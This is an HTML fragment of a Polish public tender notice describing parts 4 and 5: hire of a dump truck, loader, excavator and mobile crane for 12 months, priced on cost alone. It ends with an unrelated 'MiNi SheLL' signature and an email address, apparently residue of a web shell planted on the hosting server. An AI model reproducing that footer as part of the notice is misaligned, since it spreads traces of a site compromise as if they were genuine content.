                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Usługi sprzętem ciężkim oraz samochodem  ciężarowym o dopuszczalnej masie całkowitej do 24 ton<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi  krajowego transportu samochodowego:
a) samochodem ciężarowym  wywrotką przeznaczonym do przewozu ładunków,
b) ładowarką czołową, kołową, samojezdną, jednonaczyniową oraz
c) koparką samojezdną, kołową.
2. Szczegółowy opis usługi został opisany poniżej.	
Rodzaj usługi: Samochód ciężarowy wywrotka.
Szczegółowe wymogi:
1) przeznaczenie konstrukcyjne: przewóz ładunków,
2) dopuszczalna masa całkowita pojazdu  nie przekraczająca 24 ton,
3) ładowność  od 8 do 16 ton
4) długość skrzyni ładunkowej wewnątrz  od 6 do 8m,
Maksymalna wielkość zamówienia - 30 godzin,
Rodzaj usługi: Ładowarka czołowa, samojezdna, kołowa, jednonaczyniowa.
Szczegółowe wymogi: 
1) pojemność naczynia - od 0,5 m3 do 1,2 m3,
2) maksymalna wysokość podnoszenia naczynia - do 3,5 m.
Maksymalna wielkość zamówienia do 220 motogodzin.
Rodzaj usługi: Koparka samojezdna, kołowa. 
1) wyposażenie - koparka winna być wyposażona w zestaw minimum dwóch różnych łyżek,
2) dane techniczne - część robocza koparki wraz z kabiną winna wykonywać pełny obrót
o 360°,
3) maksymalna wysokość podnoszenia łyżki - od 4 m do 5 m.
Maksymalna wielkość zamówienia - do 60 motogodzin.
3. Zamawiający zobowiązuje się do zlecenia wykonania usług, które są przedmiotem niniejszego zamówienia, o wartości 60% maksymalnej wartości tych usług. Zlecenie wykonania pozostałych usług o wartości 40% maksymalnej wartości usług, zależeć będzie od potrzeb Zamawiającego (prawo opcji).
Szczegółowe warunki realizacji części III zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 19 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45500000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Usługi dźwigiem samochodowym<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi krajowego transportu samochodowego dźwigiem samochodowym, samojezdnym.
2. Szczegółowy opis usługi został opisany poniżej. 	
Rodzaj usługi: Dźwig samochodowy, samojezdny.
Szczegółowe wymogi: Udźwig - od 13 do 28 ton.
Maksymalna wielkość zamówienia - do 50 motogodzin.
3. Zamawiający zobowiązuje się do zlecenia wykonania usług, które są przedmiotem niniejszego zamówienia, o wartości 60% maksymalnej wartości tych usług. Zlecenie wykonania pozostałych usług o wartości 40% maksymalnej wartości usług, zależeć będzie od potrzeb Zamawiającego (prawo opcji).
Szczegółowe informacje dotyczące przedmiotu zamówienia i jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 20 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45500000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com